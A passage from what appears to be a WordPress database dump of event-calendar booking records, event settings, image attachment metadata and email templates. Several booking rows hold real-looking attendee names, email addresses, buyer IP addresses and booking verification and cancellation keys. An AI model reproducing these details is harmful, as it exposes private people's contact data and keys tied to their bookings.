garland\";s:2:\"id\";s:1:\"1\";s:5:\"count\";s:1:\"1\";s:7:\"buyerip\";s:14:\"24.126.228.147\";}}'),(168136,267047,'mec_price','0'),(168137,267047,'mec_gateway','MEC_gateway_free'),(168138,267047,'mec_gateway_label','Free'),(168139,267048,'mec_transaction_id','HKR22239'),(168140,267048,'mec_user_id','1000044'),(168141,267048,'mec_verified','1'),(168142,267048,'mec_verification_key','a9c9ed0b39072be3d394b667fb38bee3'),(168143,267048,'mec_cancellation_key','21bd98bdf5ce8f3d9c544a89d3bf4b75'),(168144,267048,'mec_confirmed','1'),(168145,267048,'mec_event_id','266604'),(168146,267048,'mec_date','1661082300:1661086800'),(168147,267048,'mec_ticket_id',',1,'),(168148,267048,'mec_booking_time','2022-08-19 21:40:43'),(168149,267048,'mec_all_dates','a:0:{}'),(168150,267048,'mec_other_dates','a:0:{}'),(168151,267048,'mec_attention_time','1661082300:1661086800'),(168152,267048,'mec_attention_time_start','1661082300'),(168153,267048,'mec_attention_time_end','1661086800'),(168154,267048,'mec_book_date_submit','20220819214043'),(168155,267048,'mec_booking_location','118'),(168156,267048,'mec_ticket_price_1','0'),(168157,267048,'mec_attendees','a:1:{i:0;a:5:{s:5:\"email\";s:26:\"colleynadanler@hotmail.com\";s:4:\"name\";s:15:\"Colleyna Danler\";s:2:\"id\";s:1:\"1\";s:5:\"count\";s:1:\"1\";s:7:\"buyerip\";s:13:\"208.93.179.71\";}}'),(168158,267048,'mec_price','0'),(168159,267048,'mec_gateway','MEC_gateway_free'),(168160,267048,'mec_gateway_label','Free'),(168161,267050,'_wp_attached_file','2022/08/BecomeALightBanner.jpg'),(168162,267050,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1434;s:6:\"height\";i:289;s:4:\"file\";s:30:\"2022/08/BecomeALightBanner.jpg\";s:8:\"filesize\";i:70665;s:5:\"sizes\";a:8:{s:6:\"medium\";a:5:{s:4:\"file\";s:29:\"BecomeALightBanner-300x60.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:60;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:5093;}s:5:\"large\";a:5:{s:4:\"file\";s:31:\"BecomeALightBanner-1024x206.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:206;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:29720;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:30:\"BecomeALightBanner-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:5519;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:30:\"BecomeALightBanner-768x155.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:155;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:19930;}s:9:\"thumblist\";a:5:{s:4:\"file\";s:30:\"BecomeALightBanner-300x289.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:289;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:14913;}s:16:\"meccarouselthumb\";a:5:{s:4:\"file\";s:30:\"BecomeALightBanner-474x289.jpg\";s:5:\"width\";i:474;s:6:\"height\";i:289;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:24295;}s:10:\"gridsquare\";a:5:{s:4:\"file\";s:30:\"BecomeALightBanner-391x260.jpg\";s:5:\"width\";i:391;s:6:\"height\";i:260;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:17577;}s:8:\"tileview\";a:5:{s:4:\"file\";s:30:\"BecomeALightBanner-300x289.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:289;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:14913;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(168163,267051,'_wp_attached_file','2022/08/BecomeALightQuote.jpg'),(168164,267051,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1402;s:6:\"height\";i:448;s:4:\"file\";s:29:\"2022/08/BecomeALightQuote.jpg\";s:8:\"filesize\";i:116899;s:5:\"sizes\";a:8:{s:6:\"medium\";a:5:{s:4:\"file\";s:28:\"BecomeALightQuote-300x96.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:96;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:6759;}s:5:\"large\";a:5:{s:4:\"file\";s:30:\"BecomeALightQuote-1024x327.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:327;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:46658;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:29:\"BecomeALightQuote-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:3912;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:29:\"BecomeALightQuote-768x245.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:245;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:30179;}s:9:\"thumblist\";a:5:{s:4:\"file\";s:29:\"BecomeALightQuote-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:11729;}s:16:\"meccarouselthumb\";a:5:{s:4:\"file\";s:29:\"BecomeALightQuote-474x324.jpg\";s:5:\"width\";i:474;s:6:\"height\";i:324;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:17801;}s:10:\"gridsquare\";a:5:{s:4:\"file\";s:29:\"BecomeALightQuote-391x260.jpg\";s:5:\"width\";i:391;s:6:\"height\";i:260;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:13582;}s:8:\"tileview\";a:5:{s:4:\"file\";s:29:\"BecomeALightQuote-300x400.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:15391;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}');
INSERT INTO `wpcl_postmeta` VALUES (168165,267051,'original-file','2022/08/BecomeALightQuote-updraft-pre-smush-original.jpg'),(168166,267051,'smush-complete','1'),(168167,267051,'smush-info','The file was compressed from 114.16 KB to 102.02 KB saving 10.63 percent using WP-Optimize'),(168168,267051,'smush-stats','a:5:{s:12:\"smushed-with\";s:11:\"re-smush-it\";s:13:\"original-size\";i:116899;s:12:\"smushed-size\";i:104472;s:15:\"savings-percent\";d:10.63;s:10:\"sizes-info\";a:9:{s:4:\"full\";a:2:{s:8:\"original\";i:116899;s:10:\"compressed\";i:104472;}s:6:\"medium\";a:2:{s:8:\"original\";i:6759;s:10:\"compressed\";i:6759;}s:5:\"large\";a:2:{s:8:\"original\";i:46658;s:10:\"compressed\";i:43997;}s:9:\"thumbnail\";a:2:{s:8:\"original\";i:3912;s:10:\"compressed\";i:3912;}s:12:\"medium_large\";a:2:{s:8:\"original\";i:30179;s:10:\"compressed\";i:28599;}s:9:\"thumblist\";a:2:{s:8:\"original\";i:11729;s:10:\"compressed\";i:11046;}s:16:\"meccarouselthumb\";a:2:{s:8:\"original\";i:17801;s:10:\"compressed\";i:16509;}s:10:\"gridsquare\";a:2:{s:8:\"original\";i:13582;s:10:\"compressed\";i:12861;}s:8:\"tileview\";a:2:{s:8:\"original\";i:15391;s:10:\"compressed\";i:14302;}}}'),(168169,267050,'original-file','2022/08/BecomeALightBanner-updraft-pre-smush-original.jpg'),(168170,267050,'smush-complete','1'),(168171,267050,'smush-info','The file was compressed from 69.01 KB to 65.48 KB saving 5.11 percent using WP-Optimize'),(168172,267050,'smush-stats','a:5:{s:12:\"smushed-with\";s:11:\"re-smush-it\";s:13:\"original-size\";i:70665;s:12:\"smushed-size\";i:67055;s:15:\"savings-percent\";d:5.11;s:10:\"sizes-info\";a:8:{s:4:\"full\";a:2:{s:8:\"original\";i:70665;s:10:\"compressed\";i:67055;}s:6:\"medium\";a:2:{s:8:\"original\";i:5093;s:10:\"compressed\";i:5093;}s:5:\"large\";a:2:{s:8:\"original\";i:29720;s:10:\"compressed\";i:29165;}s:9:\"thumbnail\";a:2:{s:8:\"original\";i:5519;s:10:\"compressed\";i:5519;}s:12:\"medium_large\";a:2:{s:8:\"original\";i:19930;s:10:\"compressed\";i:19468;}s:9:\"thumblist\";a:2:{s:8:\"original\";i:14913;s:10:\"compressed\";i:14661;}s:16:\"meccarouselthumb\";a:2:{s:8:\"original\";i:24295;s:10:\"compressed\";i:23526;}s:10:\"gridsquare\";a:2:{s:8:\"original\";i:17577;s:10:\"compressed\";i:17350;}}}'),(168173,267053,'_wp_attached_file','2022/08/2022-ESC-October-Soul-Adventure-bkgnd-1.jpg'),(168174,267053,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1294;s:6:\"height\";i:728;s:4:\"file\";s:51:\"2022/08/2022-ESC-October-Soul-Adventure-bkgnd-1.jpg\";s:8:\"filesize\";i:81790;s:5:\"sizes\";a:8:{s:6:\"medium\";a:5:{s:4:\"file\";s:51:\"2022-ESC-October-Soul-Adventure-bkgnd-1-300x169.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:169;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:7054;}s:5:\"large\";a:5:{s:4:\"file\";s:52:\"2022-ESC-October-Soul-Adventure-bkgnd-1-1024x576.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:576;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:44868;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:51:\"2022-ESC-October-Soul-Adventure-bkgnd-1-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:3726;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:51:\"2022-ESC-October-Soul-Adventure-bkgnd-1-768x432.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:432;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:28720;}s:9:\"thumblist\";a:5:{s:4:\"file\";s:51:\"2022-ESC-October-Soul-Adventure-bkgnd-1-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:10237;}s:16:\"meccarouselthumb\";a:5:{s:4:\"file\";s:51:\"2022-ESC-October-Soul-Adventure-bkgnd-1-474x324.jpg\";s:5:\"width\";i:474;s:6:\"height\";i:324;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:15876;}s:10:\"gridsquare\";a:5:{s:4:\"file\";s:51:\"2022-ESC-October-Soul-Adventure-bkgnd-1-391x260.jpg\";s:5:\"width\";i:391;s:6:\"height\";i:260;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:11445;}s:8:\"tileview\";a:5:{s:4:\"file\";s:51:\"2022-ESC-October-Soul-Adventure-bkgnd-1-300x400.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:11400;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(168175,267054,'_wp_attached_file','2022/08/2022-ESC-October-Soul-Adventure-image-text-2.png'),(168176,267054,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:535;s:6:\"height\";i:203;s:4:\"file\";s:56:\"2022/08/2022-ESC-October-Soul-Adventure-image-text-2.png\";s:8:\"filesize\";i:74163;s:5:\"sizes\";a:6:{s:6:\"medium\";a:5:{s:4:\"file\";s:56:\"2022-ESC-October-Soul-Adventure-image-text-2-300x114.png\";s:5:\"width\";i:300;s:6:\"height\";i:114;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:36213;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:56:\"2022-ESC-October-Soul-Adventure-image-text-2-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:26091;}s:9:\"thumblist\";a:5:{s:4:\"file\";s:56:\"2022-ESC-October-Soul-Adventure-image-text-2-300x203.png\";s:5:\"width\";i:300;s:6:\"height\";i:203;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:46397;}s:16:\"meccarouselthumb\";a:5:{s:4:\"file\";s:56:\"2022-ESC-October-Soul-Adventure-image-text-2-474x203.png\";s:5:\"width\";i:474;s:6:\"height\";i:203;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:64963;}s:10:\"gridsquare\";a:5:{s:4:\"file\";s:56:\"2022-ESC-October-Soul-Adventure-image-text-2-391x203.png\";s:5:\"width\";i:391;s:6:\"height\";i:203;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:58270;}s:8:\"tileview\";a:5:{s:4:\"file\";s:56:\"2022-ESC-October-Soul-Adventure-image-text-2-300x203.png\";s:5:\"width\";i:300;s:6:\"height\";i:203;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:46397;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(168177,267054,'original-file','2022/08/2022-ESC-October-Soul-Adventure-image-text-2-updraft-pre-smush-original.png'),(168178,267054,'smush-complete','1'),(168179,267054,'smush-info','The file was compressed from 72.42 KB to 32.31 KB saving 55.39 percent using WP-Optimize'),(168180,267054,'smush-stats','a:5:{s:12:\"smushed-with\";s:11:\"re-smush-it\";s:13:\"original-size\";i:74163;s:12:\"smushed-size\";i:33086;s:15:\"savings-percent\";d:55.39;s:10:\"sizes-info\";a:6:{s:4:\"full\";a:2:{s:8:\"original\";i:74163;s:10:\"compressed\";i:33086;}s:6:\"medium\";a:2:{s:8:\"original\";i:36213;s:10:\"compressed\";i:14602;}s:9:\"thumbnail\";a:2:{s:8:\"original\";i:26091;s:10:\"compressed\";i:11291;}s:9:\"thumblist\";a:2:{s:8:\"original\";i:46397;s:10:\"compressed\";i:22334;}s:16:\"meccarouselthumb\";a:2:{s:8:\"original\";i:64963;s:10:\"compressed\";i:31679;}s:10:\"gridsquare\";a:2:{s:8:\"original\";i:58270;s:10:\"compressed\";i:27910;}}}'),(168181,267053,'original-file','2022/08/2022-ESC-October-Soul-Adventure-bkgnd-1-updraft-pre-smush-original.jpg'),(168182,267053,'smush-complete','1'),(168183,267053,'smush-info','The file was compressed from 79.87 KB to 76.31 KB saving 4.46 percent using WP-Optimize'),(168184,267053,'smush-stats','a:5:{s:12:\"smushed-with\";s:11:\"re-smush-it\";s:13:\"original-size\";i:81790;s:12:\"smushed-size\";i:78146;s:15:\"savings-percent\";d:4.46;s:10:\"sizes-info\";a:9:{s:4:\"full\";a:2:{s:8:\"original\";i:81790;s:10:\"compressed\";i:78146;}s:6:\"medium\";a:2:{s:8:\"original\";i:7054;s:10:\"compressed\";i:6988;}s:5:\"large\";a:2:{s:8:\"original\";i:44868;s:10:\"compressed\";i:44868;}s:9:\"thumbnail\";a:2:{s:8:\"original\";i:3726;s:10:\"compressed\";i:3660;}s:12:\"medium_large\";a:2:{s:8:\"original\";i:28720;s:10:\"compressed\";i:28720;}s:9:\"thumblist\";a:2:{s:8:\"original\";i:10237;s:10:\"compressed\";i:10171;}s:16:\"meccarouselthumb\";a:2:{s:8:\"original\";i:15876;s:10:\"compressed\";i:15876;}s:10:\"gridsquare\";a:2:{s:8:\"original\";i:11445;s:10:\"compressed\";i:11445;}s:8:\"tileview\";a:2:{s:8:\"original\";i:11400;s:10:\"compressed\";i:11400;}}}'),(168186,267060,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:250;s:6:\"height\";i:303;s:4:\"file\";s:21:\"2022/08/harold-10.jpg\";s:8:\"filesize\";i:27502;s:5:\"sizes\";a:4:{s:6:\"medium\";a:5:{s:4:\"file\";s:21:\"harold-10-248x300.jpg\";s:5:\"width\";i:248;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:21396;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:21:\"harold-10-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:7640;}s:9:\"thumblist\";a:5:{s:4:\"file\";s:21:\"harold-10-250x300.jpg\";s:5:\"width\";i:250;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:24955;}s:10:\"gridsquare\";a:5:{s:4:\"file\";s:21:\"harold-10-250x260.jpg\";s:5:\"width\";i:250;s:6:\"height\";i:260;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:21915;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(168234,267092,'mec_certain_weekdays','a:0:{}'),(168235,267092,'mec_allday','0'),(168236,267092,'one_occurrence','0'),(168237,267092,'mec_hide_time','0'),(168238,267092,'mec_hide_end_time','0'),(168239,267092,'mec_comment',''),(168240,267092,'mec_timezone','global'),(168241,267092,'mec_countdown_method','global'),(168242,267092,'mec_public','1'),(168243,267092,'mec_start_date','2022-09-15'),(168244,267092,'mec_start_time_hour','7'),(168245,267092,'mec_start_time_minutes','0'),(168246,267092,'mec_start_time_ampm','PM'),(168247,267092,'mec_start_day_seconds','68400'),(168248,267092,'mec_end_date','2022-09-15'),(168249,267092,'mec_end_time_hour','8'),(168250,267092,'mec_end_time_minutes','0'),(168251,267092,'mec_end_time_ampm','PM'),(168252,267092,'mec_end_day_seconds','72000'),(168253,267092,'mec_repeat_status','0'),(168254,267092,'mec_repeat_type',''),(168255,267092,'mec_repeat_interval','1'),(168256,267092,'mec_repeat_end',''),(168257,267092,'mec_repeat_end_at_occurrences',''),(168258,267092,'mec_repeat_end_at_date',''),(168259,267092,'mec_advanced_days','a:0:{}'),(168260,267092,'mec_in_days',''),(168261,267092,'mec_not_in_days',''),(168262,267092,'mec_hourly_schedules','a:0:{}'),(168263,267092,'mec_booking','a:22:{s:24:\"bookings_limit_unlimited\";s:1:\"0\";s:14:\"bookings_limit\";s:0:\"\";s:28:\"roles_discount_administrator\";s:0:\"\";s:21:\"roles_discount_editor\";s:0:\"\";s:21:\"roles_discount_author\";s:0:\"\";s:26:\"roles_discount_contributor\";s:0:\"\";s:25:\"roles_discount_subscriber\";s:0:\"\";s:24:\"roles_discount_organizer\";s:0:\"\";s:25:\"roles_discount_uram_guest\";s:0:\"\";s:24:\"bookings_all_occurrences\";s:1:\"0\";s:33:\"bookings_all_occurrences_multiple\";s:1:\"0\";s:26:\"show_booking_form_interval\";s:0:\"\";s:35:\"stop_selling_after_first_occurrence\";s:1:\"0\";s:11:\"auto_verify\";s:6:\"global\";s:12:\"auto_confirm\";s:6:\"global\";s:35:\"last_few_tickets_percentage_inherit\";s:1:\"1\";s:27:\"last_few_tickets_percentage\";s:3:\"100\";s:21:\"thankyou_page_inherit\";s:1:\"1\";s:21:\"booking_thankyou_page\";s:0:\"\";s:26:\"booking_thankyou_page_time\";s:4:\"2000\";s:29:\"bookings_user_limit_unlimited\";s:1:\"1\";s:19:\"bookings_user_limit\";s:0:\"\";}'),(168264,267092,'mec_tickets','a:0:{}'),(168265,267092,'mec_fees_global_inheritance','1'),(168266,267092,'mec_fees','a:0:{}'),(168267,267092,'mec_ticket_variations_global_inheritance','1'),(168268,267092,'mec_ticket_variations','a:0:{}'),(168269,267092,'mec_reg_fields_global_inheritance','1'),(168270,267092,'mec_reg_fields','a:0:{}'),(168271,267092,'mec_bfixed_fields','a:0:{}'),(168272,267092,'mec_op','a:0:{}'),(168273,267092,'mec_fields','a:0:{}'),(168274,267092,'mec_event_status','EventScheduled'),(168275,267092,'mec_moved_online_link',''),(168276,267092,'mec_cancelled_reason',''),(168277,267092,'mec_display_cancellation_reason_in_single_page',''),(168278,267092,'boldgrid_hide_page_title','0'),(168279,267092,'mec_notifications','a:3:{s:20:\"booking_notification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:0:\"\";s:7:\"content\";s:0:\"\";}s:18:\"email_verification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:27:\"Please verify your booking.\";s:7:\"content\";s:153:\"<p>Hi %%name%%,</p>\r\n<p>Please verify your booking by clicking on following link:</p>\r\n<p>%%verification_link%%</p>\r\n<p>Regards,<br />\r\n%%blog_name%%</p>\";}s:18:\"admin_notification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:26:\"A new booking is received.\";s:7:\"content\";s:195:\"<p>Dear Admin,</p>\r\n<p>A new booking is received. Please check and confirm it as soon as possible.</p>\r\n<p>%%admin_link%%</p>\r\n<p>%%attendees_full_info%%</p>\r\n<p>Regards,<br />\r\n%%blog_name%%</p>\";}}'),(168280,267092,'passster_activate_global_protection',NULL),(168281,267092,'passster_activate_protection',NULL),(168282,267092,'passster_protection_type','password'),(168283,267092,'boldgrid_in_page_containers','1'),(168286,267092,'_dp_original','266626'),(168285,267092,'_thumbnail_id','266627'),(168287,267092,'_edit_lock','1673150065:2'),(168288,267092,'_edit_last','2'),(191576,269023,'smush-info','The file was compressed from 202.02 KB to 202.02 KB, saving 0 percent, using WP-Optimize'),(170292,267260,'mec_verification_key','02067912ba552a9dd0e3ce688c2dd955'),(170293,267260,'mec_cancellation_key','b9eceb5f6c7add9986031072a16007da'),(191575,269023,'smush-complete','1'),(170289,267260,'mec_transaction_id','MOF87584'),(170290,267260,'mec_user_id','1000015'),(170291,267260,'mec_verified','1'),(168362,267101,'passster_activate_global_protection',NULL),(168363,267101,'passster_activate_protection',NULL),(168364,267101,'passster_protection_type','password'),(168365,267101,'boldgrid_in_page_containers','1'),(168366,267101,'_dp_original','265240'),(168367,267101,'_edit_lock','1661613239:15'),(168368,267101,'_edit_last','15'),(168369,267101,'_thumbnail_id','266997'),(168370,267102,'protect_children',''),(168371,267102,'mec_color',''),(168372,267102,'mec_location_id','161'),(168373,267102,'mec_dont_show_map','0'),(168374,267102,'mec_organizer_id','1'),(168375,267102,'mec_read_more',''),(168376,267102,'mec_more_info',''),(168377,267102,'mec_more_info_title',''),(168378,267102,'mec_more_info_target','_self'),(168379,267102,'mec_cost',''),(168380,267102,'mec_currency','a:0:{}'),(168381,267102,'mec_additional_organizer_ids','a:0:{}'),(168382,267102,'mec_additional_location_ids','a:0:{}'),(168383,267102,'mec_date','a:4:{s:5:\"start\";a:4:{s:4:\"date\";s:10:\"2022-10-02\";s:4:\"hour\";s:1:\"4\";s:7:\"minutes\";s:1:\"0\";s:4:\"ampm\";s:2:\"PM\";}s:3:\"end\";a:4:{s:4:\"date\";s:10:\"2022-10-02\";s:4:\"hour\";s:1:\"5\";s:7:\"minutes\";s:2:\"30\";s:4:\"ampm\";s:2:\"PM\";}s:7:\"comment\";s:0:\"\";s:6:\"repeat\";a:6:{s:4:\"type\";s:5:\"daily\";s:8:\"interval\";s:1:\"1\";s:8:\"advanced\";s:0:\"\";s:3:\"end\";s:5:\"never\";s:11:\"end_at_date\";s:0:\"\";s:18:\"end_at_occurrences\";s:2:\"10\";}}'),(168384,267102,'mec_repeat','a:6:{s:4:\"type\";s:5:\"daily\";s:8:\"interval\";s:1:\"1\";s:8:\"advanced\";s:0:\"\";s:3:\"end\";s:5:\"never\";s:11:\"end_at_date\";s:0:\"\";s:18:\"end_at_occurrences\";s:2:\"10\";}'),(168385,267102,'mec_certain_weekdays','a:0:{}'),(168386,267102,'mec_allday','0'),(168387,267102,'one_occurrence','0'),(168388,267102,'mec_hide_time','0'),(168389,267102,'mec_hide_end_time','0'),(168390,267102,'mec_comment',''),(168391,267102,'mec_timezone','global'),(168392,267102,'mec_countdown_method','global'),(168393,267102,'mec_public','1'),(168394,267102,'mec_start_date','2022-10-02'),(168395,267102,'mec_start_time_hour','4'),(168396,267102,'mec_start_time_minutes','0'),(168397,267102,'mec_start_time_ampm','PM'),(168398,267102,'mec_start_day_seconds','57600'),(168399,267102,'mec_end_date','2022-10-02'),(168400,267102,'mec_end_time_hour','5'),(168401,267102,'mec_end_time_minutes','30'),(168402,267102,'mec_end_time_ampm','PM'),(168403,267102,'mec_end_day_seconds','63000'),(168404,267102,'mec_repeat_status','0'),(168405,267102,'mec_repeat_type',''),(168406,267102,'mec_repeat_interval','1'),(168407,267102,'mec_repeat_end',''),(168408,267102,'mec_repeat_end_at_occurrences',''),(168409,267102,'mec_repeat_end_at_date',''),(168410,267102,'mec_advanced_days','a:0:{}'),(168411,267102,'mec_in_days',''),(168412,267102,'mec_not_in_days',''),(168413,267102,'mec_hourly_schedules','a:0:{}'),(168414,267102,'mec_booking','a:22:{s:24:\"bookings_limit_unlimited\";s:1:\"0\";s:14:\"bookings_limit\";s:0:\"\";s:28:\"roles_discount_administrator\";s:0:\"\";s:21:\"roles_discount_editor\";s:0:\"\";s:21:\"roles_discount_author\";s:0:\"\";s:26:\"roles_discount_contributor\";s:0:\"\";s:25:\"roles_discount_subscriber\";s:0:\"\";s:24:\"roles_discount_organizer\";s:0:\"\";s:25:\"roles_discount_uram_guest\";s:0:\"\";s:24:\"bookings_all_occurrences\";s:1:\"0\";s:33:\"bookings_all_occurrences_multiple\";s:1:\"0\";s:26:\"show_booking_form_interval\";s:0:\"\";s:35:\"stop_selling_after_first_occurrence\";s:1:\"0\";s:11:\"auto_verify\";s:6:\"global\";s:12:\"auto_confirm\";s:6:\"global\";s:35:\"last_few_tickets_percentage_inherit\";s:1:\"1\";s:27:\"last_few_tickets_percentage\";s:3:\"100\";s:21:\"thankyou_page_inherit\";s:1:\"1\";s:21:\"booking_thankyou_page\";s:0:\"\";s:26:\"booking_thankyou_page_time\";s:4:\"2000\";s:29:\"bookings_user_limit_unlimited\";s:1:\"1\";s:19:\"bookings_user_limit\";s:0:\"\";}'),(168415,267102,'mec_tickets','a:0:{}'),(168416,267102,'mec_fees_global_inheritance','1'),(168417,267102,'mec_fees','a:0:{}'),(168418,267102,'mec_ticket_variations_global_inheritance','1'),(168419,267102,'mec_ticket_variations','a:0:{}'),(168420,267102,'mec_reg_fields_global_inheritance','1'),(168421,267102,'mec_reg_fields','a:0:{}'),(168422,267102,'mec_bfixed_fields','a:0:{}'),(168423,267102,'mec_op','a:0:{}'),(168424,267102,'mec_fields','a:0:{}'),(168425,267102,'mec_event_status','EventScheduled'),(168426,267102,'mec_moved_online_link',''),(168427,267102,'mec_cancelled_reason',''),(168428,267102,'mec_display_cancellation_reason_in_single_page',''),(168429,267102,'boldgrid_hide_page_title','0'),(168430,267102,'mec_notifications','a:3:{s:20:\"booking_notification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:0:\"\";s:7:\"content\";s:0:\"\";}s:18:\"email_verification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:27:\"Please verify your booking.\";s:7:\"content\";s:153:\"<p>Hi %%name%%,</p>\r\n<p>Please verify your booking by clicking on following link:</p>\r\n<p>%%verification_link%%</p>\r\n<p>Regards,<br />\r\n%%blog_name%%</p>\";}s:18:\"admin_notification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:26:\"A new booking is received.\";s:7:\"content\";s:195:\"<p>Dear Admin,</p>\r\n<p>A new booking is received. Please check and confirm it as soon as possible.</p>\r\n<p>%%admin_link%%</p>\r\n<p>%%attendees_full_info%%</p>\r\n<p>Regards,<br 